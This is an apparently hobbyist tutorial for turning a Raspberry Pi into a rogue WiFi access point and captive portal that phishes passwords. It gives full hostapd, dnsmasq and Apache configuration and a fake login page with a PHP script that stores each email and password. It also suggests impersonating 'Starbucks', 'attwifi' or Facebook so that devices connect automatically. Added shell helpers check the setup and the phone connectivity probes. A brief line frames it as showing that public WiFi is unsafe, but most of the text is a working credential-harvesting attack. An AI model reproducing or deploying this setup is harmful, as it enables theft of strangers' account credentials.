
About: Setting up a Rogue Access Point on a Raspberry Pi is very easy. Our access point will advertise a fake network offering free WiFi to the victim. It acts as a captive portal, meaning every website a user tries to visit is redirected to our login page, where they are asked to enter their credentials. You can style the login page to look like a Facebook or Google login and name the network “Free Facebook WiFi”. The network set up here has no internet uplink, so everything stays on the Raspberry Pi; you can later bridge the connection to a 4G modem or Ethernet to give users real internet access.

This tutorial demonstrates how unsafe public WiFi is and why you should never send personal information over a public network. We can also set our SSID to something like “attwifi” or “Starbucks”. If you use a popular SSID, a victim’s phone will automatically join your network if it has joined an open network with that name before: devices match a saved network by SSID and security type, not by the access point’s MAC address (BSSID), so an open network with the same name looks identical to them. This is not limited to phones; laptops and any other WiFi-enabled devices behave the same way.

Objective: To setup a Rogue Access Point and make our network act as a Captive Portal to Phish Passwords

Material: You will need the following:

Raspberry Pi (usually around $36)

USB wireless adapter that supports AP mode (I use the Alfa AWUS036H in this tutorial)

Instructions: Let’s start with a fresh Raspbian install. I installed Raspbian Lite since I will run the Pi headless and connect over SSH. Once the Pi is set up, run the update and upgrade:

sudo apt-get update
sudo apt-get upgrade

Next we need to install the tools for the access point.

isc-dhcp-server is a DHCP server, used to hand out IP addresses to clients; in the configuration below dnsmasq ends up doing this job, so you can leave isc-dhcp-server out. hostapd is the user-space daemon that turns the wireless card into an access point. dnsmasq is our DNS (and, here, DHCP) server, and apache2 is the web server. PHP5 receives the login form and stores the credentials. Install them with the following command (on newer Raspbian releases the PHP package is called php instead of php5):

sudo apt-get install -y isc-dhcp-server hostapd dnsmasq apache2 php5

Next we need the name of our wireless interface. I am using the Raspberry Pi 3, which has a built-in WiFi card. The built-in Broadcom adapter can run as an access point with hostapd’s nl80211 driver, but I am using an external USB WiFi adapter in this tutorial. Whatever card you pick, confirm AP support before going further: iw list (from the iw package) prints a “Supported interface modes” section, and “* AP” must appear in it. Use the following command to list your interfaces:

ifconfig

You should see a list of all your interfaces. If a USB WiFi adapter is attached it will most likely be named wlan1, with wlan0 being the built-in card. Since I am using an external USB adapter, my wireless interface name is “wlan1”.

Now let’s edit the hostapd configuration file. Here we set the SSID of our rogue access point and the channel it runs on. Run the following command; the file should not exist yet, so nano will open an empty buffer:

sudo nano /etc/hostapd/hostapd.conf

Enter the following into the configuration file. The driver and hw_mode lines make the defaults explicit: nl80211 is the driver for mac80211-based USB adapters such as the Alfa, and g selects 2.4 GHz 802.11g.

interface=wlan1
driver=nl80211
ssid=freefacebookwifi
hw_mode=g
channel=1

Now hit CTRL+X to exit and save the configuration file.

Next we tell the hostapd service where our configuration file lives. Type the following command:

sudo nano /etc/init.d/hostapd

Look for DAEMON_CONF. It should be blank. Add the path of the configuration file we just created, so the line reads “DAEMON_CONF=/etc/hostapd/hostapd.conf”. The init script also sources /etc/default/hostapd, which carries the same (commented-out) DAEMON_CONF line; that file is the one intended for local settings, so setting the path there instead works equally well and is less likely to be touched by a package upgrade.

Now hit CTRL+X to exit and save the configuration file.

Next we edit the dnsmasq configuration file. Open it with the following command:

sudo nano /etc/dnsmasq.conf

Scroll all the way to the bottom and add the following lines, keeping the interface name you found earlier:

interface=wlan1
address=/#/10.0.0.1
dhcp-range=10.0.0.10,10.0.0.250,12h

The address line makes dnsmasq answer every DNS query (“#” matches all names) with 10.0.0.1, the address we will assign to the WiFi interface in the next step; this is what sends every website to our web server. The interface line restricts dnsmasq to the access-point interface. The dhcp-range line is the pool of addresses handed to clients who connect, with a 12-hour lease. Because dnsmasq serves DHCP here, the isc-dhcp-server package installed earlier is not actually used.

Hit CTRL+X to exit and save the configuration file.

Now let’s give the wlan1 interface a static address matching the one we put in the dnsmasq configuration. Type the following command to edit the interfaces file:

sudo nano /etc/network/interfaces

Edit the stanza for the wireless card you are using (wlan1 here) so that it reads:

iface wlan1 inet static
    address 10.0.0.1
    netmask 255.255.255.0
    broadcast 10.0.0.255

The broadcast address must belong to the subnet: for 10.0.0.0/24 it is 10.0.0.255 (255.0.0.0 is a netmask, not a broadcast address). On Raspbian images that manage addresses with dhcpcd, also add “denyinterfaces wlan1” to /etc/dhcpcd.conf so dhcpcd does not override the static address.

Now hit CTRL+X to exit and save the configuration file.

Run the following commands so the services start at boot:

sudo update-rc.d apache2 defaults
sudo update-rc.d hostapd defaults
sudo update-rc.d dnsmasq defaults

If you installed isc-dhcp-server, disable it (sudo update-rc.d isc-dhcp-server disable) so it cannot compete with dnsmasq for DHCP on wlan1.
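The interface, hostapd, dnsmasq and interfaces steps above all have to agree on one subnet, and the card has to support AP mode at all. The following shell helper is an added example, not code from the original tutorial: it parses `iw list` output for AP support, derives the network and broadcast addresses from an address and netmask, refuses a DHCP range outside the subnet, and prints the three configuration fragments from one set of values. The interface name, SSID, channel, addresses and the sample `iw list` output embedded below are illustrative values chosen for the example.

```sh
#!/bin/sh
# Added preflight helper for the access-point setup (not part of the original
# tutorial). Checks `iw list` output for AP mode and derives the network,
# broadcast and DHCP range from one address and netmask so that the
# hostapd, dnsmasq and interfaces fragments agree.
# wlan1, freefacebookwifi, 10.0.0.0/24 and the sample iw output are example values.

# ip4_to_int 10.0.0.1 -> 167772161
ip4_to_int() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# int_to_ip4 167772161 -> 10.0.0.1
int_to_ip4() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# network_of ADDR NETMASK -> network address (10.0.0.1 255.255.255.0 -> 10.0.0.0)
network_of() {
    int_to_ip4 $(( $(ip4_to_int "$1") & $(ip4_to_int "$2") ))
}

# broadcast_of ADDR NETMASK -> directed broadcast (10.0.0.1 255.255.255.0 -> 10.0.0.255),
# the value the interfaces stanza needs
broadcast_of() {
    m=$(ip4_to_int "$2")
    int_to_ip4 $(( ($(ip4_to_int "$1") & m) | (~m & 4294967295) ))
}

# in_subnet IP ADDR NETMASK -> succeeds when IP and ADDR share the subnet
in_subnet() {
    m=$(ip4_to_int "$3")
    [ $(( $(ip4_to_int "$1") & m )) -eq $(( $(ip4_to_int "$2") & m )) ]
}

# supports_ap_mode (reads `iw list` output on stdin)
# succeeds when "* AP" is listed under "Supported interface modes:"
supports_ap_mode() {
    awk '
        /Supported interface modes:/ { inmodes = 1; next }
        inmodes && /^[ \t]*\*/      { if ($2 == "AP") found = 1; next }
        inmodes                     { inmodes = 0 }
        END { exit found ? 0 : 1 }
    '
}

# render_configs IFACE SSID CHANNEL ADDR NETMASK RANGE_LO RANGE_HI
# prints the three fragments; fails if the DHCP range is outside the subnet
render_configs() {
    iface=$1 ssid=$2 chan=$3 addr=$4 mask=$5 lo=$6 hi=$7
    in_subnet "$lo" "$addr" "$mask" && in_subnet "$hi" "$addr" "$mask" || {
        echo "dhcp-range $lo-$hi is not inside $(network_of "$addr" "$mask")/$mask" >&2
        return 1
    }
    cat <<EOF
# /etc/hostapd/hostapd.conf
interface=$iface
driver=nl80211
ssid=$ssid
hw_mode=g
channel=$chan

# append to /etc/dnsmasq.conf
interface=$iface
address=/#/$addr
dhcp-range=$lo,$hi,12h

# /etc/network/interfaces stanza
iface $iface inet static
    address $addr
    netmask $mask
    broadcast $(broadcast_of "$addr" "$mask")
EOF
}

# Constructed sample of `iw list` output for a card that can do AP mode.
sample_iw_list() {
    cat <<'EOF'
Wiphy phy1
        Supported interface modes:
                 * IBSS
                 * managed
                 * AP
                 * monitor
        Band 1:
                Capabilities: 0x172
EOF
}

# On a real Pi, replace sample_iw_list with `iw list`.
if sample_iw_list | supports_ap_mode; then
    render_configs wlan1 freefacebookwifi 1 10.0.0.1 255.255.255.0 10.0.0.10 10.0.0.250
else
    echo "card does not support AP mode" >&2
fi
```

On the Pi itself, pipe the real `iw list` into supports_ap_mode and paste the printed fragments into the three files; changing the address or netmask in one place keeps the broadcast and DHCP pool consistent.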

We are almost done. Let’s create a self-signed SSL certificate so that Apache also answers HTTPS requests that land on it. Be aware that no browser will trust this certificate: a user who opens an HTTPS site will get a certificate warning, and sites protected by HSTS (facebook.com and google.com among them) cannot be clicked through at all. The certificate only makes the HTTPS port respond; the phishing page itself is reached over plain HTTP.

Let’s create the folder where we will store the certificate:

sudo mkdir /etc/apache2/ssl

Run the following command to create the certificate and fill out the requested data. The answers don’t matter much, since the certificate is self-signed and untrusted either way. I put “*” for the Common Name; note that browsers do not accept a bare “*” as a wildcard, so the Common Name will not make any site match.

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/apache2/ssl/server.crt -keyout /etc/apache2/ssl/server.key

Now let’s enable Apache’s SSL module (mod_ssl, not mod_rewrite):

sudo a2enmod ssl

Next enable the default SSL site. Apache’s sites-enabled directory holds symbolic links (not hard links) to the files in sites-available; create the link by hand as below, or run “sudo a2ensite default-ssl”, which creates it for you under the name default-ssl.conf instead of 000-default-ssl.conf.

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

Now let’s point the Apache SSL site at the certificate we created:

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Scroll down and find the two lines starting with SSLCertificate (by default they point at the snakeoil certificate) and change them to:

SSLCertificateFile /etc/apache2/ssl/server.crt
SSLCertificateKeyFile /etc/apache2/ssl/server.key

Finally restart Apache for all our changes to take effect:

sudo /etc/init.d/apache2 restart

That’s basically it. We have created a rogue wireless access point, and every hostname now resolves to our web server. There is no internet connection, so whoever connects will not get online. You can forward the WiFi traffic out through a 4G data card or Ethernet, but that is not covered in this tutorial. What I will show is how to use this setup to collect usernames and passwords with a fake login.

Have you ever joined a free WiFi hotspot and had to accept terms and conditions before you could use the internet? I will show you how to create a very basic login page of that kind and recover the data users type into it. You can style the page to look like a Facebook or Google login if you like.

Let’s start by making the web directory writable and removing the default home page. The commands below use chmod 777; a tighter choice is to hand the directory to the Apache user instead (sudo chown www-data:www-data /var/www/html), since only Apache needs to write here.

sudo chmod 777 /var/www/html
sudo rm /var/www/html/index.html   # remove the default Apache home page

Create a folder to store the usernames and passwords. Note that this folder sits inside the web root, so anyone who connects to the access point can browse to it (we rely on that later to read the results):

sudo mkdir /var/www/html/passwords
sudo chmod 777 /var/www/html/passwords

Now lets create our main login homepage which every site will redirect to:

sudo nano /var/www/html/index.php

Put the following HTML into the file we just created and then hit CTRL+X to exit and save the file:

<html>
<body>
<form action="submit.php" method="post">
Email Address:<br>
<input type="text" name="uname">
<br>
Password:<br>
<input type="password" name="password">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

This will create a basic login page where the user can enter an email and password. Now lets create the submit.php file which will store the email and password that the user enters.

sudo nano /var/www/html/submit.php

Put the following code into the submit.php file we just created and then hit CTRL+X to exit and save the file. Compared with the simplest version, it checks that both fields were posted, strips unsafe characters from the email before using it in a file name (otherwise “../” typed into the email field could point the write outside the passwords folder), and appends with FILE_APPEND instead of reading a file that does not exist yet.

<?php
// Only handle a form POST that carries both fields.
if (!isset($_POST["uname"], $_POST["password"])) {
    http_response_code(400);
    exit("Missing form fields.");
}
$uname = $_POST["uname"];
// The email becomes part of a file name, so keep only safe characters there.
$safe = preg_replace('/[^A-Za-z0-9@._-]/', '_', $uname);
$filename = "/var/www/html/passwords/" . $safe . " - " . time();
// Append "email - password" to the file, creating it on first write.
file_put_contents($filename, $uname . " - " . $_POST["password"] . "\n", FILE_APPEND | LOCK_EX);
?>
Success, You have logged in. You can now use the free internet!

This stores the emails and passwords entered on our form. Each submission becomes a text file in the “passwords” folder we created earlier, named after the (sanitized) email followed by the Unix time.

Reboot the Raspberry Pi so all the services start and the access point appears:

sudo reboot

That’s it! To test it out, connect a phone or laptop to the new WiFi network and browse to any website; you should land on the login page. Most phones will also pop up their captive-portal sheet as soon as they join, because the connectivity check they send is answered by our server instead of the real one.

Adding /passwords/ to the end of any URL shows Apache’s directory listing of all submitted forms. Anyone on the network can open this listing too, so keep the Pi’s reach limited to your own test.

Clicking on a file shows the email and password that were entered.
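The captive-portal sheet mentioned above appears because each phone runs a fixed connectivity probe on join: Android fetches generate_204 and expects HTTP 204, Apple devices fetch hotspot-detect.html and expect a page containing “Success”. Our dnsmasq answers every name with 10.0.0.1 and Apache returns the login page, so both probes fail their check and the OS declares the network captive. The following shell snippet is an added example, not code from the original post: classify_probe encodes that decision on a captured status and body, and run_probe performs the real request with curl (assumed installed) from a client on the test network. The probe URLs are the public ones used by those vendors; the sample login-page body is constructed for the example.

```sh
#!/bin/sh
# Added example (not from the original post): emulate the connectivity probe a
# phone runs when it joins a network. Android expects HTTP 204 from
# generate_204; Apple expects a body containing "Success" from
# hotspot-detect.html. Any other answer marks the network as captive, which is
# what the rogue AP's catch-all DNS plus Apache login page produces.
# curl is assumed to be installed; the probe URLs are the vendors' public ones.

ANDROID_PROBE="http://connectivitycheck.gstatic.com/generate_204"
APPLE_PROBE="http://captive.apple.com/hotspot-detect.html"

# classify_probe VENDOR HTTP_STATUS BODY -> prints open, captive or offline
classify_probe() {
    vendor=$1 status=$2 body=$3
    case "$status" in
        ''|000) echo offline; return 0 ;;
    esac
    case "$vendor" in
        android)
            if [ "$status" = 204 ]; then echo open; else echo captive; fi ;;
        apple)
            case "$body" in
                *Success*) echo open ;;
                *)         echo captive ;;
            esac ;;
        *) echo captive ;;
    esac
}

# run_probe VENDOR URL -> performs the real probe; redirects are deliberately not
# followed, since a 302 to the portal is exactly the signal a phone looks for
run_probe() {
    tmp=$(mktemp)
    status=$(curl -s -m 5 -o "$tmp" -w '%{http_code}' "$2" 2>/dev/null) || status=000
    body=$(cat "$tmp"); rm -f "$tmp"
    classify_probe "$1" "$status" "$body"
}

# Constructed body standing in for what the rogue AP's Apache serves (HTTP 200).
portal_page='<html><body><form action="submit.php" method="post">Email Address:</form></body></html>'

echo "android via rogue AP: $(classify_probe android 200 "$portal_page")"
echo "apple via rogue AP:   $(classify_probe apple 200 "$portal_page")"
echo "apple via real host:  $(classify_probe apple 200 '<HTML><BODY>Success</BODY></HTML>')"
# From a client joined to the rogue AP: run_probe android "$ANDROID_PROBE"
```

From a laptop joined to the access point, run_probe android "$ANDROID_PROBE" should print captive; the same call from a normal network prints open, which is a quick way to confirm the catch-all DNS and web server are working before trying a phone.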